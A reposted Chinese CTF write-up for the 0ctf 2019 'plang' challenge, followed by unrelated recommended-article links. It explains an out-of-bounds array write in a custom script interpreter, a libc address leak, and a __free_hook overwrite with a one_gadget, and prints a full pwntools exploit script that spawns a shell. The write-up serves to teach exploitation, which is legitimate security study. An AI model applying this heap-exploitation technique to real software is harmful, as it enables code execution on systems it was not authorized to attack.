热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

从crash到getshell0ctf2019_plang详解,网站安全分享!

 这是0ctf中的一道题目,题目提供了一个poc文件 varaThisisaPoC!System.print(a)varb[1,2,3]b[0x80000000]0


从crash到getshell 0ctf2019_plang 详解,
 
这是0ctf中的一道题目,题目提供了一个poc文件
 
var a = "This is a PoC!"
System.print(a)
var b = [1, 2, 3]
b[0x80000000] = 0x123
我们在ida中的字符串中能够发现如下的代码:
从crash到getshell 0ctf2019_plang 详解,
可以看出这是一个类似于Javascript的解释器。
gdb加载程序,并设置参数,程序crash了。这是因为
从crash到getshell 0ctf2019_plang 详解,
从crash到getshell 0ctf2019_plang 详解,
 
漏洞分析:
我们发现rcx寄存器是个非法的地址。查看代码我们发现rcx是通过rax+rdx获取的,而rax和rdx是在栈上获取的。
从crash到getshell 0ctf2019_plang 详解,
通过调试我们可以看到,rax是数组b的基址,rdx是数组的偏移。漏洞点就在数组存在越界读写。
为了利用该漏洞,我们需要分析清楚该js解释器的数据结构,才能来进行读写。
分析数据结构,构造如下的poc
var a = "This is a PoC!"
System.print(a)
var b = [1, 2, "aaaaa",[3,"ddddd"]]
 
 
从crash到getshell 0ctf2019_plang 详解,
从crash到getshell 0ctf2019_plang 详解,
 
Strcut obj_ptr{
long unkown;
void *ptr1;
void *ptr2;
objbuffrer *ptr;
int size;
int size;
}
我们在数组中声明的变量值为1和2,在堆中却为0x3ff0000000000000和0x4000000000000000,实际上是用浮点形式存储的。所以我们读写的数据都要按照浮点形式存储。
 
Struct objtype{
long type;//如果是double类型的为4,如果为其他类型的为5
union{
        double value;
        obj_ptr* obj;
    };
}
struct objstr{
    int type;
    int padding;
    void* ptr1;
    void* ptr2;
    int some_val;
    int size;
char[] contents;
};
 
漏洞利用:
地址泄露
在分析程序的时候,我们注意到Objstr类型,有一个size位,如果利用任意地址写,将Objstr类型的size位改大,就能打印出很多地址,而后面的内存中正好有libc有关的地址。
从crash到getshell 0ctf2019_plang 详解,
这里有几个地方需要注意:一个是偏移的计算,一个是要将size转化成double类型。
从crash到getshell 0ctf2019_plang 详解,
从crash到getshell 0ctf2019_plang 详解,
如果我们直接打印字符串a,后面的’x00’会截断,我们通过下面的方式逐个字节读取
从crash到getshell 0ctf2019_plang 详解,
任意地址写
我们发现obj_ptr结构体中存在一个指针,将objbuffrer 的指针改写成我们想改写的地址即可。
 
Strcut obj_ptr{
long unkown;
void *ptr1;
void *ptr2;
objbuffrer *ptr;
int size;
int size;
}
尝试了malloc_hook和free_hook后发现有个onegadget劫持free_hook可以拿到shell。
 
exp:
from pwn import *
import struct
EXE=’./plang’
context.binary = EXE
elf = ELF(EXE)
libc=elf.libc
io=process(EXE)
def dbg(s=”):
gdb.attach(io,s)
def runscript(pay):
io.sendlineafter(‘> ‘,pay)
def int2double(num):
return struct.pack(", num).encode(‘hex’)
def double2int(nstr):
return (struct.unpack(‘d’, nstr)[0])
libcoffset=0x155554f88ca0- 0x155554b9d000
heapoffset=0x555555780750-(0x5555557741b8-0x10)
one_gadget=[0x4f2c5,0x4f322,0x10a38c]
buf=”
pay1= "var a = "aaaaaa""
pay3= "var b = [1, 2, "bbbbbb"]"
pay4= "var c = [ 4 , 5]"
b_addr = 0x555555788b70
a_addr = 0x555555787f20
offset=(a_addr-b_addr)/16

lens=1#int2double(0x100)
pay5= "b[%d] = %d" %(offset,lens)
paylist=[pay1,pay3,pay4,pay5]
for i in paylist:
runscript(i)
slibc = (0x555555788028 – 0x555555787f30)
pay1="System.print(a[%d])"%slibc
pay2="System.print(a[%d])"%(slibc+1)
pay3="System.print(a[%d])"%(slibc+2)
pay4="System.print(a[%d])"%(slibc+3)
pay5="System.print(a[%d])"%(slibc+4)
pay6="System.print(a[%d])"%(slibc+5)
paylist=[pay1,pay2,pay3,pay4,pay5,pay6]
for i in paylist:
runscript(i)
buf+=io.recv(1)
libcaddr=u64(buf.ljust(8,’x00′)) – libcoffset
print ‘libcaddr:’,hex(libcaddr)
libc.address=libcaddr
c_addr=0x555555788e10+0x20
offset=(b_addr-c_addr)/16
free_hook=libc.sym[‘__free_hook’]
lens=double2int(p64(free_hook-8))
pay1= "c[%d] = %.330f" %(offset,lens)
runscript(pay1)
data=double2int(p64(libcaddr+one_gadget[1]))
pay2="b[0]=%.330f"%(data)
runscript(pay2)
pay="var e="aaaaaaaaaa""
runscript(pay)
io.interactive()
 
体会感受:
这道题目不同于传统的pwn堆利用的那种菜单题目,如果上来就通过ida,gdb从头分析程序,会花费大量时间和精力,难度也很大。我们从poc入手通过crash分析程序的漏洞点,理清数据结构,从而实现利用,比较接近现实中漏洞利用的过程。
 

www.dengb.comtruehttp://www.dengb.com/wzaq/1348083.htmlTechArticle从crash到getshell 0ctf2019_plang 详解, 这是0ctf中的一道题目,题目提供了一个poc文件 var a = This is a PoC! System.print(a) var b = [1, 2, 3] b[0x80000000] =…

—-想了解更多的网站安全相关处理怎么解决关注<编程笔记>


推荐阅读
  • Linux重启网络命令实例及关机和重启示例教程
    本文介绍了Linux系统中重启网络命令的实例,以及使用不同方式关机和重启系统的示例教程。包括使用图形界面和控制台访问系统的方法,以及使用shutdown命令进行系统关机和重启的句法和用法。 ... [详细]
  • 本文讨论了在Windows 8上安装gvim中插件时出现的错误加载问题。作者将EasyMotion插件放在了正确的位置,但加载时却出现了错误。作者提供了下载链接和之前放置插件的位置,并列出了出现的错误信息。 ... [详细]
  • android listview OnItemClickListener失效原因
    最近在做listview时发现OnItemClickListener失效的问题,经过查找发现是因为button的原因。不仅listitem中存在button会影响OnItemClickListener事件的失效,还会导致单击后listview每个item的背景改变,使得item中的所有有关焦点的事件都失效。本文给出了一个范例来说明这种情况,并提供了解决方法。 ... [详细]
  • 生成式对抗网络模型综述摘要生成式对抗网络模型(GAN)是基于深度学习的一种强大的生成模型,可以应用于计算机视觉、自然语言处理、半监督学习等重要领域。生成式对抗网络 ... [详细]
  • Spring源码解密之默认标签的解析方式分析
    本文分析了Spring源码解密中默认标签的解析方式。通过对命名空间的判断,区分默认命名空间和自定义命名空间,并采用不同的解析方式。其中,bean标签的解析最为复杂和重要。 ... [详细]
  • VScode格式化文档换行或不换行的设置方法
    本文介绍了在VScode中设置格式化文档换行或不换行的方法,包括使用插件和修改settings.json文件的内容。详细步骤为:找到settings.json文件,将其中的代码替换为指定的代码。 ... [详细]
  • 向QTextEdit拖放文件的方法及实现步骤
    本文介绍了在使用QTextEdit时如何实现拖放文件的功能,包括相关的方法和实现步骤。通过重写dragEnterEvent和dropEvent函数,并结合QMimeData和QUrl等类,可以轻松实现向QTextEdit拖放文件的功能。详细的代码实现和说明可以参考本文提供的示例代码。 ... [详细]
  • 开发笔记:加密&json&StringIO模块&BytesIO模块
    篇首语:本文由编程笔记#小编为大家整理,主要介绍了加密&json&StringIO模块&BytesIO模块相关的知识,希望对你有一定的参考价值。一、加密加密 ... [详细]
  • CSS3选择器的使用方法详解,提高Web开发效率和精准度
    本文详细介绍了CSS3新增的选择器方法,包括属性选择器的使用。通过CSS3选择器,可以提高Web开发的效率和精准度,使得查找元素更加方便和快捷。同时,本文还对属性选择器的各种用法进行了详细解释,并给出了相应的代码示例。通过学习本文,读者可以更好地掌握CSS3选择器的使用方法,提升自己的Web开发能力。 ... [详细]
  • Metasploit攻击渗透实践
    本文介绍了Metasploit攻击渗透实践的内容和要求,包括主动攻击、针对浏览器和客户端的攻击,以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码,以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ... [详细]
  • sklearn数据集库中的常用数据集类型介绍
    本文介绍了sklearn数据集库中常用的数据集类型,包括玩具数据集和样本生成器。其中详细介绍了波士顿房价数据集,包含了波士顿506处房屋的13种不同特征以及房屋价格,适用于回归任务。 ... [详细]
  • 本文介绍了三种方法来实现在Win7系统中显示桌面的快捷方式,包括使用任务栏快速启动栏、运行命令和自己创建快捷方式的方法。具体操作步骤详细说明,并提供了保存图标的路径,方便以后使用。 ... [详细]
  • Linux服务器密码过期策略、登录次数限制、私钥登录等配置方法
    本文介绍了在Linux服务器上进行密码过期策略、登录次数限制、私钥登录等配置的方法。通过修改配置文件中的参数,可以设置密码的有效期、最小间隔时间、最小长度,并在密码过期前进行提示。同时还介绍了如何进行公钥登录和修改默认账户用户名的操作。详细步骤和注意事项可参考本文内容。 ... [详细]
  • 如何使用Java获取服务器硬件信息和磁盘负载率
    本文介绍了使用Java编程语言获取服务器硬件信息和磁盘负载率的方法。首先在远程服务器上搭建一个支持服务端语言的HTTP服务,并获取服务器的磁盘信息,并将结果输出。然后在本地使用JS编写一个AJAX脚本,远程请求服务端的程序,得到结果并展示给用户。其中还介绍了如何提取硬盘序列号的方法。 ... [详细]
  • 本文介绍了九度OnlineJudge中的1002题目“Grading”的解决方法。该题目要求设计一个公平的评分过程,将每个考题分配给3个独立的专家,如果他们的评分不一致,则需要请一位裁判做出最终决定。文章详细描述了评分规则,并给出了解决该问题的程序。 ... [详细]
author-avatar
envmm_884_836
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有